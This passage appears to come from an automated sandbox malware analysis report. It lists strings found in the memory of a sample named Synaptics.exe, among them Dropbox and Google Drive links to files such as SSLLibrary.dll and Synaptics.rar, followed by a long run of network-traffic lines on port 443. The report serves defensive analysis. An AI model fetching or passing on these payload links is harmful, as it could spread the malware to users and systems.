                              Source: Synaptics.exe, 00000003.00000002.2967562658.000000000B92E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960447631.000000000AF2E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2967479457.000000000B7EE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.comuc?id=0BxsMXGfPIZfSVlVsOGlEVGxuVk&export=download
                              Source: Synaptics.exe, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                              Source: Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/PIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=dow
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.000000000545E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.0000000000720000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN2k
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: ._cache_ccmsetup.exeString found in binary or memory: https://login.microsoftonline.com/common/oauth2/token
                              Source: ._cache_ccmsetup.exeString found in binary or memory: https://login.windows.net
                              Source: ._cache_ccmsetup.exeString found in binary or memory: https://login.windows.net/common
                              Source: ccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                              Source: ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                              Source: Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                              Source: ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                              Source: Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                              Source: ccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlP
                              Source: ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                              Source: Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
